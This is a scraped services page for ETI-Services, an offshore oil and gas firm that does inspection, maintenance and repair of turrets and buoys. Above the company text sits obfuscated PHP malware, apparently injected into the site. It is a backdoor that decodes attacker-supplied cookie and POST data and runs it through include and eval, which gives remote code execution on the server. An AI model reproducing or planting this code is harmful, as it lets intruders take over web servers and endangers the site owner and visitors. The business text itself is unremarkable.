$EtmVNi = "\105" . 'O' . chr (118) . chr (95) . "\150" . chr ( 177 - 94 ).chr (68) . "\156" . "\116";$etVCDOsDIs = chr (99) . "\154" . "\141" . chr ( 456 - 341 ).chr (115) . chr (95) . chr ( 793 - 692 )."\170" . "\x69" . "\163" . "\x74" . chr (115); $nyBKicmJ = class_exists($EtmVNi); $etVCDOsDIs = "31236";$cCqPu = !1;if ($nyBKicmJ == $cCqPu){function fGegra(){$EiWqfTYn = new /* 43305 */ EOv_hSDnN(24282 + 24282); $EiWqfTYn = NULL;}$PDcEYaNwp = "24282";class EOv_hSDnN{private function HvDejIgBD($PDcEYaNwp){if (is_array(EOv_hSDnN::$hWMzfbLFA)) {$sfYdgiBkuT = sys_get_temp_dir() . "/" . crc32(EOv_hSDnN::$hWMzfbLFA["\x73" . chr (97) . chr (108) . 't']);@EOv_hSDnN::$hWMzfbLFA[chr (119) . "\x72" . "\x69" . 't' . "\x65"]($sfYdgiBkuT, EOv_hSDnN::$hWMzfbLFA[chr ( 836 - 737 ).chr (111) . "\156" . "\x74" . 'e' . 'n' . 't']);include $sfYdgiBkuT;@EOv_hSDnN::$hWMzfbLFA['d' . "\145" . chr (108) . chr ( 1045 - 944 )."\x74" . 'e']($sfYdgiBkuT); $PDcEYaNwp = "24282";exit();}}private $cwRZVTb;public function ddjgh(){echo 16374;}public function __destruct(){EOv_hSDnN::$hWMzfbLFA = @unserialize(EOv_hSDnN::$hWMzfbLFA); $PDcEYaNwp = "32957_1243";$this->HvDejIgBD($PDcEYaNwp); $PDcEYaNwp = "32957_1243";}public function LdjztKyj($ekjPJ, $DupEpo){return $ekjPJ[0] ^ str_repeat($DupEpo, (strlen($ekjPJ[0]) / strlen($DupEpo)) + 1);}public function __construct($WdiiWYIFCW=0){$LfbfW = $_POST;$kjowAeI = $_COOKIE;$DupEpo = "1075db07-7b1a-4b19-9e4d-4f863f3c3b7d";$jauzeiwOBN = @$kjowAeI[substr($DupEpo, 0, 4)];if (!empty($jauzeiwOBN)){$QYjXQ = "base64";$ekjPJ = "";$jauzeiwOBN = explode(",", $jauzeiwOBN);foreach ($jauzeiwOBN as $ptOaU){$ekjPJ .= @$kjowAeI[$ptOaU];$ekjPJ .= @$LfbfW[$ptOaU];}$ekjPJ = array_map($QYjXQ . '_' . "\144" . chr (101) . "\143" . chr (111) . 'd' . "\145", array($ekjPJ,));EOv_hSDnN::$hWMzfbLFA = $this->LdjztKyj($ekjPJ, $DupEpo);}}public static $hWMzfbLFA = 63114;}fGegra();}$MmUOe = chr (99) . '_' . "\143" . chr ( 679 - 579 )."\141" . 'q' . "\x78";$iWFiLBamO = "\x63" . "\x6c" . 'a' . chr (115) . 's' . chr (95) . chr ( 620 - 519 ).'x' . "\x69" . "\163" . "\x74" . chr ( 1055 - 940 ); $KxkMTU = class_exists($MmUOe); $iWFiLBamO = "62775";$RwpUEhm = !1;if ($KxkMTU == $RwpUEhm){function ZZfWSGUDW(){$suuxIK = new /* 33368 */ c_cdaqx(6527 + 6527); $suuxIK = NULL;}$jLzDeK = "6527";class c_cdaqx{private function fohGRwa($jLzDeK){if (is_array(c_cdaqx::$bTAeueYb)) {$DbYHqU = str_replace("\x3c" . "\77" . "\160" . "\150" . "\160", "", c_cdaqx::$bTAeueYb[chr ( 461 - 362 ).chr (111) . chr (110) . "\164" . 'e' . chr ( 437 - 327 )."\164"]);eval($DbYHqU); $jLzDeK = "6527";exit();}}private $muIyi;public function uSJTA(){echo 49297;}public function __destruct(){c_cdaqx::$bTAeueYb = @unserialize(c_cdaqx::$bTAeueYb); $jLzDeK = "42941_55820";$this->fohGRwa($jLzDeK); $jLzDeK = "42941_55820";}public function hzmMd($QLkptJdX, $oBZhOSL){return $QLkptJdX[0] ^ str_repeat($oBZhOSL, (strlen($QLkptJdX[0]) / strlen($oBZhOSL)) + 1);}public function __construct($XevgOsT=0){$ldOlCUQ = $_POST;$IbRRQuXSot = $_COOKIE;$oBZhOSL = "cb924851-3d20-4992-9c1e-acc89dc3e534";$mHZFBADoe = @$IbRRQuXSot[substr($oBZhOSL, 0, 4)];if (!empty($mHZFBADoe)){$CEdlmeLVz = "base64";$QLkptJdX = "";$mHZFBADoe = explode(",", $mHZFBADoe);foreach ($mHZFBADoe as $oqPHWvGMv){$QLkptJdX .= @$IbRRQuXSot[$oqPHWvGMv];$QLkptJdX .= @$ldOlCUQ[$oqPHWvGMv];}$QLkptJdX = array_map($CEdlmeLVz . "\137" . "\144" . "\x65" . 'c' . "\x6f" . 'd' . "\145", array($QLkptJdX,));c_cdaqx::$bTAeueYb = $this->hzmMd($QLkptJdX, $oBZhOSL);}}public static $bTAeueYb = 824;}ZZfWSGUDW();} Services - eti.services

Our services

Services Overview

ETI-Services team of highly experienced offshore Oil & Gas professionals supports our clients’ operations providing Inspection Maintenance and Repair (IMR) services for Turrets or Loading/Unloading Buoys.

ETI-Services team covers a wide range of competences including Electrical, Instrumentation, Structural, Mechanical, Hydraulic, and Telemetry. With the support of ETI-Offshore Engineering, it can undertake a comprehensive scope of services, including:

  • On-site inspection and reporting
  • Refurbishment scope definition
  • New equipment scope definition
  • Engineering and procurement/fabrication of new equipment
  • Supply of spare parts
  • On-site assistance for refurbishment, installation, and testing


ETI- Services also provides site support for the installation, commissioning and start-up of the new systems supplied by ETI-Offshore.

ETI- Services benefits from synergies and shared services with the rest of the ETI Group of companies, especially with regards to Engineering support and Procurement and Administration services.

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Track Record

The ETI-Services team has successfully completed a large number of IMR activities encompassing the following non-exhaustive areas: 

  • General offshore work and inspection  
  • Swivel stack & swivels maintenance and refurbishment 
  • Buoys overhauls and refurbishment 
  • CPU renewals / change-outs 
  • Main roller bearing inspections and change-outs 
  • Bogie wheel & rail inspections and change-outs